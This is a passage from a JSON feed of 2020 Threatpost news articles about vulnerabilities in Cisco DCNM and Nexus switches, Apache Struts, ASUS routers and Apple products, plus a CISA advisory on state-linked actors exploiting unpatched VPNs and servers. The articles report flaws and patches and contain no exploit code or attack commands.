3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-02T16:16:31", "type": "threatpost", "title": "Severe Cisco DoS Flaw Can Cripple Nexus Switches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10136", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-02T16:16:31", "id": "THREATPOST:B664DFB1B57D66837AE025D5CD687F70", "href": "https://threatpost.com/cisco-dos-flaw-nexus-switches/156203/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-10-15T22:26:49", "description": "Cisco Systems has issued patches for three critical vulnerabilities impacting a key tool for managing its network platform and switches. The bugs could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices, the vendor said.\n\nthe networking giant disclosed the critical flaws on Thursday; all three (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) impact the Cisco Data Center Network Manager (DCNM), a platform for managing its data centers running Cisco\u2019s NX-OS. NX-OS is the network operating system used by Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches.\n\nAffected products include Cisco DCNM software releases earlier than Release 11.3 for Microsoft Windows, Linux and virtual appliance platforms. \n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to the [Tenable researchers that analyzed the bugs](<https://www.tenable.com/blog/cve-2019-15975-cve-2019-15976-cve-2019-15977-critical-authentication-bypass-vulnerabilities-in>), two of the flaws ([CVE-2019-15975](<https://www.tenable.com/cve/CVE-2019-15975>) and [CVE-2019-15976](<https://www.tenable.com/cve/CVE-2019-15976>)), \u201care authentication bypass vulnerabilities in the REST API and SOAP API endpoints for Cisco DCNM due to the existence of a static encryption key shared between installations.\u201d\n\nRepresentational State Transfer (REST) is an architecture style for designing networked applications, [according to RestFulApi.net](<https://restfulapi.net/>). Simple Object Access Protocol (SOAP) is a standard communication protocol system that permits processes using different operating systems such as Linux and Windows to communicate via HTTP and its XML, according to a [DZone description](<https://dzone.com/articles/difference-between-rest-and-soap-api>).\n\n\u201cA remote, unauthenticated attacker could gain administrative privileges through either the REST API or SOAP API by sending a specially crafted request that includes a valid session token generated using the static encryption key,\u201d wrote Satnam Narang, senior research engineer with [Tenable, in a blog post outlining the discovery](<https://www.tenable.com/blog/cve-2019-15975-cve-2019-15976-cve-2019-15977-critical-authentication-bypass-vulnerabilities-in>).\n\nCisco [wrote in its security advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass>) that vulnerabilities can be exploited independently of the other.\n\nThe third bug ([CVE-2019-15976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15976>)) is described by Cisco as \u201cdata center network manager authentication bypass vulnerability.\u201d This flaw exists in the web-based management interface of the DCNM, allowing an unauthenticated, remote attacker to bypass authentication on an affected device.\n\n\u201cThe vulnerability is due to the presence of static credentials. An attacker could exploit this vulnerability by using the static credentials to authenticate against the user interface,\u201d Cisco wrote. \u201cA successful exploit could allow the attacker to access a specific section of the web interface and obtain certain confidential information from an affected device. This information could be used to conduct further attacks against the system.\u201d\n\nEach of the three bugs received a Common Vulnerability Scoring System Score of 9.8 severity. Cisco has [released software updates](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass>) patching the vulnerabilities. The company added there are no workarounds to fix the problems.\n\nIn addition to the three critical bugs, Cisco patched nine additional flaws of lesser severity, also tied to its DCNM component.\n", "cvss3": {}, "published": "2020-01-03T18:33:29", "type": "threatpost", "title": "3 Critical Bugs Allow Remote Attacks on Cisco NX-OS and Switches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-5135"], "modified": "2020-01-03T18:33:29", "id": "THREATPOST:C4650E22534F775312B3885DAA306DDA", "href": "https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:14", "description": "Proof-of-concept exploit code surfaced on GitHub on Friday, raising the stakes on two existing Apache Struts 2 bugs that allow for remote code-execution and denial-of-service attacks on vulnerable installations.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) issued an alert regarding the two bugs, tracked as [CVE-2019-0230](<https://cwiki.apache.org/confluence/display/WW/S2-059>) and [CVE-2019-0233](<https://cwiki.apache.org/confluence/display/WW/S2-060>). Impacted are Apache Struts versions 2.0.0 through 2.5.20. Remediation includes upgrading to Struts 2.5.22, according to the Apache Struts Security Team.\n\nStruts 2 is an open-source coding framework and library for enterprise developers popular with developers and companies when creating Java-based applications. Both the exploitable vulnerabilities in question were fixed last November. \n[](<https://threatpost.com/newsletter-sign/>) \nResearchers have warned of outdated installations of Apache Struts 2 and that [if left unpatched](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>) they can open the door to more critical holes similar to a bug at the root of the [massive Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)).\n\n## **PoC Released to GitHub**\n\nThe proof-of-concept (PoC) [released this week ](<https://github.com/cellanu/cve-2019-0230>)raises the greatest concern with CVE-2019-0230, originally rated important when first uncovered by Matthias Kaiser at Apple Information Security. The bug is triggered when a threat actor sends a malicious Object-Graph Navigation Language (OGNL) expressions that can then open the door for a remote code-execution attack, according to the security bulletin. OGNL is a Java language that can let attackers access data objects, and then use them to create and inject server-side code.\n\n\u201cSuccessful exploitation of the most severe of these vulnerabilities (CVE-2019-0230) could allow for remote code-execution in the context of the affected application. Depending on the privileges associated with the application, an attacker could install programs; view, change or delete data; or create new accounts with full user rights,\u201d according to a bulletin issued Friday by the Multi-State Information Sharing & Analysis Center at the Center for Internet Security.\n\nWhile the PoC attack and exploit posted to GitHub targets CVE-2019-0230, the Apache Struts Security Team also urged users to patch for the DoS bug (CVE-2019-0233). The vulnerability affects the write permissions of file directories that could lead to conditions ripe for a DoS attack.\n\nAccording to the Apache Struts 2 Wiki description of the bug, this flaw can be triggered with a file upload to a Strut\u2019s Action that exposes the file.\n\n\u201cAn attacker may manipulate the request such that the working copy of the uploaded file is set to read-only. As a result, subsequent actions on the file will fail with an error. It might also be possible to set the Servlet container\u2019s temp directory to read only, such that subsequent upload actions will fail,\u201d [according the description](<https://cwiki.apache.org/confluence/display/WW/S2-060>).\n\nThe Apache security bulletin recommends upgrading to the most recent version of Apache Struts. It also suggests security teams verify no unauthorized system modifications have occurred on the system before applying the patch, and they run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary [Threatpost eBook](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>), 2020 in Security: Four Stories from the New Threat Landscape, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. [Click here to download our eBook now](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)._**\n", "cvss3": {}, "published": "2020-08-14T21:20:01", "type": "threatpost", "title": "PoC Exploit Targeting Apache Struts Surfaces on GitHub", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-5135"], "modified": "2020-08-14T21:20:01", "id": "THREATPOST:0DD2AEA1738F9B6612B1C845F3BC949F", "href": "https://threatpost.com/poc-exploit-github-apache-struts/158393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:03", "description": "Proof-of-concept exploit code has been published for critical flaws impacting the Cisco Data Center Network Manager (DCNM) tool for managing network platforms and switches.\n\nThe three critical vulnerabilities in question (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) impact DCNM, a platform for managing Cisco data centers that run Cisco\u2019s NX-OS \u2014 the network operating system used by Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches.\n\nThe flaws, patched on[ Jan. 3](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>), could allow an unauthenticated, remote attacker to bypass endpoint authentication and execute arbitrary actions with administrative privileges on targeted devices.\n\nFast forward to this week, the security researcher who initially discovered the flaws, Steven Seeley, released public PoC exploits for the flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cIn this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root,\u201d he explained in a [blog post](<https://srcincite.io/blog/2020/01/14/busting-ciscos-beans-hardcoding-your-way-to-hell.html>).\n\n\u201cIn the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.\u201d\n\n## The Flaws\n\nTwo of the flaws ([CVE-2019-15975](<https://www.tenable.com/cve/CVE-2019-15975>) and [CVE-2019-15976](<https://www.tenable.com/cve/CVE-2019-15976>)) are authentication bypass vulnerabilities in the REST API and SOAP API endpoints for Cisco DCNM. Representational State Transfer (REST) is an architecture style for designing networked applications, [according to RestFulApi.net;](<https://restfulapi.net/>) while Simple Object Access Protocol (SOAP) is a standard communication protocol system that allows processes using different operating systems (like Linux and Windows) to communicate via HTTP and its XML, according to a [DZone description](<https://dzone.com/articles/difference-between-rest-and-soap-api>). The flaw stems specifically from the existence of a static encryption key shared between REST API and SOAP API installations.\n\nThe third bug ([CVE-2019-15976](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15976>)) is described by Cisco as \u201cdata center network manager authentication bypass vulnerability.\u201d This flaw exists in the web-based management interface of the DCNM, allowing an unauthenticated, remote attacker to bypass authentication on an affected device.\n\n## PoC Exploit\n\nSeeley said he was able to exploit the flaw by targeting two different setups of DCNM \u201cbecause some code paths and exploitation techniques were platform specific.\u201d Those two were the Cisco DCNM installer for Windows and DCNM ISO Virtual Appliance for VMWare servers (both were DCNM version 11.2, released June 18, 2019).\n\n> I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. \n> \n> Busting Cisco's Beans :: Hardcoding Your Way to Hell <https://t.co/EkwwJ2u195>\n> \n> PoC exploit code:<https://t.co/Xsae7j8xkl><https://t.co/5LxxCEtnRE><https://t.co/8i5u1kLcEi>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [January 14, 2020](<https://twitter.com/steventseeley/status/1217113588294410243?ref_src=twsrc%5Etfw>)\n\nSeeley said that he was able to control all the elements to forge his own token and then use a hardcoded key to generate a Single Sign-On Token (ssoToken), which allowed him to bypass authentication.\n\nFrom there, he could \u201csend a SOAP request to the /DbAdminWSService/DbAdminWS endpoint and add a global admin user that will give us access to all interfaces,\u201d he said.\n\nWith the PoC exploit code now available, Cisco is urging customers to update. The networking giant [released software updates](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200102-dcnm-auth-bypass>) patching the vulnerabilities earlier this month,\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory,\u201d according to Cisco\u2019s advisory, which was updated on Wednesday.\n\n**_Concerned about mobile security? _**[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) **_Top 8 Best Practices for Mobile App Security, on Jan. 22 at 2 p.m. ET. Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts from Secureworks and White Ops to discuss the secrets of building a secure mobile strategy, one app at a time. _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)**_._**\n\n**Share this article:**\n\n * [Editor's Picks](<https://threatpost.com/category/editors-picks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-01-16T22:18:51", "type": "threatpost", "title": "Critical Cisco Flaws Now Have PoC Exploit", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-01-16T22:18:51", "id": "THREATPOST:E95FF75420C541DF65D4D795CF73B5CE", "href": "https://threatpost.com/cisco-dcnm-flaw-exploit/151949/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:21:37", "description": "Cisco is warning of a high-severity flaw that could allow remote, unauthenticated attackers to cripple several of its popular small-business switches with denial of service (DoS) attacks.\n\nThe vulnerability stems from the IPv6 packet processing engine in the switches. IPv6 (also known as Internet Protocol version 6) is the most recent version of the Internet Protocol (IP), the communications protocol that provides an identification system for computers on networks and routes traffic across the Internet.\n\nThe flaw (CVE-2020-3363), which has a CVSS score of 8.6 out of 10, is due to insufficient validation of incoming IPv6 traffic.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted IPv6 packet through an affected device,\u201d said [Cisco in its Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sbss-ipv6-dos-3bLk6vA>). \u201cA successful exploit could allow the attacker to cause an unexpected reboot of the switch, leading to a DoS condition.\u201d\n\nCisco switches affected by this flaw include: 250 Series Smart Switches, 350 Series Managed Switches, 350X Series Stackable Managed Switches, 550X Series Stackable Managed Switches. These switch lineups range in functionality and price, but all were released between 2015 and 2016, and all are web-managed, entry-level devices intended for small businesses. Updates are available for these products in Release 2.5.5.4.7.\n\nAlso affected by the flaw are three series of switches that have reached the end-of-software-maintenance milestone, meaning they will not receive patches. Those are: Small Business 200 Series Smart Switches, Small Business 300 Series Managed Switches and Small Business 500 Series Stackable Managed Switches. It\u2019s not the first time that end of life (EoL) has stopped Cisco from issuing patches for these specific switches when they were vulnerable. In July, Cisco warned that [it wasn\u2019t issuing firmware updates](<https://threatpost.com/cisco-warns-high-severity-bug-small-business-switch/157090/>) in the three switches to address a high-severity flaw that could allow remote, unauthenticated attackers to access the switches\u2019 management interfaces with administrative privileges.\n\nThe Cisco Product Security Incident Response Team (PSIRT) said it is not aware of any public announcements or malicious use of the vulnerability. This flaw specifically affects IPv6 traffic \u2013 IPv4 traffic (the IP that IPv6 replaced) is not affected, said Cisco.\n\n\u201cCisco has released software updates that address this vulnerability for devices that have not reached the end of software maintenance,\u201d Cisco said. \u201cThere are no workarounds that address this vulnerability.\u201d\n\nBeyond this flaw, Cisco fixed three other high-severity vulnerabilities, with a slew of Thursday security advisories.\n\nOne of those is a [similar vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asr-dos-zJLJFgBf>) in the IPv6 implementation of Cisco StarOS. Cisco StarOS is a virtualized software architecture that spans the ASR (Aggregation Services Routers) 5000 Series. This flaw (CVE-2020-3324) also stems from insufficient validation of incoming IPv6 traffic and could enable an unauthenticated, remote attacker to launch a DoS attack on affected devices.\n\nAnother high-severity flaw (CVE-2020-3411) in [Cisco\u2019s DNA Center software](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dna-info-disc-3bz8BCgR>) could allow an unauthenticated remote attacker access to sensitive information on impacted systems. The Cisco DNA Center is a network controller and management dashboard, with integrated tools for network management, automation, virtualization, analytics, security and internet of things (IoT) connectivity.\n\nA final flaw (CVE-2020-3433) [plugged by Cisco on Wednesday](<https://threatpost.com/black-hat-2020-using-botnets-to-manipulate-energy-markets-for-big-profits/158102/>) exists in the AnyConnect Secure Mobility Client for Windows, Cisco\u2019s unified security endpoint agent that delivers security services to protect the enterprise. The flaw exists in the interprocess communication (IPC) channel and could allow an authenticated, local attacker to perform an attack called DLL hijacking, where attackers exploit Windows applications search and load Dynamic Link Libraries.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-06T15:24:45", "type": "threatpost", "title": "High-Severity Cisco DoS Flaw Plagues Small-Business Switches", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3324", "CVE-2020-3363", "CVE-2020-3411", "CVE-2020-3433", "CVE-2020-5135"], "modified": "2020-08-06T15:24:45", "id": "THREATPOST:51EF909F29E9FE8B04A35A1E24E52C08", "href": "https://threatpost.com/high-severity-cisco-dos-flaw-small-business-switches/158124/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:16:19", "description": "A pair of flaws in ASUS routers for the home could allow an attacker to compromise the devices \u2013 and eavesdrop on all of the traffic and data that flows through them.\n\nThe bugs are specifically found in the RT-AC1900P whole-home Wi-Fi model, within the router\u2019s firmware update functionality. Originally uncovered by Trustwave, ASUS has issued patches for the bugs, and owners are urged to apply the updates as soon as they can.\n\nThe first issue (CVE-2020-15498) stems from a lack of certificate checking.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe router uses [GNU Wget](<https://www.gnu.org/software/wget/>) to fetch firmware updates from ASUS servers. It\u2019s possible to log in via SSH and use the Linux/Unix [\u201cgrep\u201d command](<https://www.geeksforgeeks.org/grep-command-in-unixlinux/>) to search through the filesystem for a specific string that indicates that the vulnerability is present: \u201c\u2013no-check-certificate.\u201d\n\nIn vulnerable versions of the router, the files containing that string are shell scripts that perform downloads from the ASUS update servers, according to [Trustwave\u2019s advisory](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=27440>), issued on Thursday. This string indicates that there\u2019s no certificate checking, so an attacker could use untrusted (forged) certificates to force the install of malicious files on the targeted device.\n\nAn attacker would need to be connected to the vulnerable router to perform a man in the middle attack (MITM), which would allow that person complete access to all traffic going through the device.\n\nThe latest firmware eliminates the bug by not using the Wget option anymore.\n\nThe second bug (CVE-2020-15499) is a cross-site scripting (XSS) vulnerability in the Web Management interface related to firmware updates, according to Trustwave.\n\n\u201cThe release notes page did not properly escape the contents of the page before rendering it to the user,\u201d explained the firm. \u201cThis means that a legitimate administrator could be attacked by a malicious party using the first MITM finding and chaining it with arbitrary JavaScript code execution.\u201d\n\nASUS fixed this in the latest firmware so that the release notes page no longer renders arbitrary contents verbatim.\n\n\u201cSince routers like this one typically define the full perimeter of a network, attacks targeting them can potentially affect all traffic in and out of your network,\u201d warned Trustwave.\n\nASUS patched the issues in firmware version 3.0.0.4.385_20253.\n\nThe bug disclosure comes less than two weeks after a [bombshell security review](<https://threatpost.com/report-most-popular-home-routers-have-critical-flaws/157346/>) of 127 popular home routers found most contained at least one critical security flaw, according to researchers. Not only did all of the routers the researchers examined have flaws, many \u201care affected by hundreds of known vulnerabilities,\u201d the researchers said.\n\nOn average, the routers analyzed\u2013\u2014by vendors such as D-Link, Netgear, ASUS, Linksys, TP-Link and Zyxel\u2014were affected by 53 critical-rated vulnerabilities (CVE), with even the most \u201csecure\u201d device of the bunch having 21 CVEs, according to the report. Researchers did not list the specific vulnerabilities.\n", "cvss3": {}, "published": "2020-07-23T16:04:30", "type": "threatpost", "title": "ASUS Home Router Bugs Open Consumers to Snooping Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15498", "CVE-2020-15499", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-07-23T16:04:30", "id": "THREATPOST:9234A5FE45618A7D601CF00D4A75748E", "href": "https://threatpost.com/asus-home-router-bugs-snooping-attacks/157682/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-15T22:25:23", "description": "Apple\u2019s latest security fixes, [released Tuesday](<https://support.apple.com/en-us/HT201222>), tackle a wide range of bugs, including several patches for high-risk flaws that could allow for remote code execution (RCE). Of particular interest to privacy-minded iPhone 11 users is an iOS 13.3.1 update that allows users to turn off U1 Ultra-Wideband device tracking.\n\nThe fixes address vulnerabilities in Apple\u2019s Xcode, watchOS, Safari, iTunes for Windows, iOS, iPadOS, macOS and tvOS. The most severe of the bugs include four RCE flaws in Apple TV\u2019s operating system, tvOS \u2013 each rated high-severity.\n\nTracked as [CVE-2020-3868](<https://exchange.xforce.ibmcloud.com/vulnerabilities/175187>), one tvOS RCE bug has a CVSS severity score of 8.8 out of 10, the highest among those patched Tuesday. The bug is tied to multiple memory corruption issues in Apple\u2019s browser engine, WebKit. \u201cBy persuading a victim to visit a specially crafted website, an attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service,\u201d according [a description of the flaw](<https://exchange.xforce.ibmcloud.com/vulnerabilities/175187>). \n[](<https://threatpost.com/newsletter-sign/>)\n\nThe other tvOS code execution bugs ([CVE-2020-3840](<https://exchange.xforce.ibmcloud.com/vulnerabilities/175191>), [CVE-2020-3870](<https://exchange.xforce.ibmcloud.com/vulnerabilities/175183>), [CVE-2020-3878](<https://exchange.xforce.ibmcloud.com/vulnerabilities/175184>)) all have a CVSS rating of 7.8. Two of the RCE vulnerabilities are tied to Imageio Python libraries tvOS, and the other is tied to Apple\u2019s use of the secure network protocol suite IPSec.\n\n## **Off Switch for Tracking via U1 Ultra Wideband**\n\nLast December, KrebsOnSecurity [first reported a tracking mechanism](<https://krebsonsecurity.com/2019/12/the-iphone-11-pros-location-data-puzzler/>) in the iPhone 11 family of handsets. The tracking took place whether or not an iPhone 11 user turned off the handset\u2019s location services. After some sleuthing by the site\u2019s author, Brian Krebs, he determined the tracking feature was tied to the use of Apple\u2019s own U1 chip, which was introduced in 2019 and used for the first time in iPhone 11S.\n\nThe U1 chips uses Ultra-Wideband technology and aims to improve the performance of Apple services such as AirDrop. The U1 goes so far as to provide precise location and spatial awareness of the iPhone 11\u2019s position relative to other Apple devices in the same room. This allows someone to point their iPhone 11 at another iPhone 11 and have that device automatically show up at the top of the AirDrop list for transferring files \u2013 no manual discovery needed.\n\nUsers voiced concerns that the new chip allowed for tracking iPhone 11 users\u2019 locations. To address the issue, Apple has now added a switch to disable location tracking for networking and wireless functions. With the release of iOS 13.3.1, users can now turn off the tracking feature, either when turning off location services or selectively. To turn it off, users can go to Settings > Privacy > Location Services > System Services.\n\nTuesday\u2019s security updates come on the heels of several staggered iOS 13 updates. In their wake, Apple has faced criticism for what critics see as a piecemeal release of the OS. Last month Apple updated the OS to iOS 13.3, which marked the third update to the iOS and iPadOS 13 since it debuted in on Sept. 19. Since iOS 13\u2019s release, Apple has also had to issue a number of security patches, including ones for a [keyboard bug](<https://threatpost.com/bug-granting-full-access-keyboards/148638/>) and a [lock-screen bypass flaw](<https://threatpost.com/iphone-ios-13-lockscreen-bypass/148332/>).\n", "cvss3": {}, "published": "2020-01-29T22:09:30", "type": "threatpost", "title": "Apple Security Updates Tackle iOS Device Tracking, RCE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3840", "CVE-2020-3868", "CVE-2020-3870", "CVE-2020-3878", "CVE-2020-5135"], "modified": "2020-01-29T22:09:30", "id": "THREATPOST:ABBA6B89522F29EE1F01F3D010F46FC0", "href": "https://threatpost.com/apple-patches-ios-device-tracking/152364/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. And, they have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; they have also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vector for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public facing applications. In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said, maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register 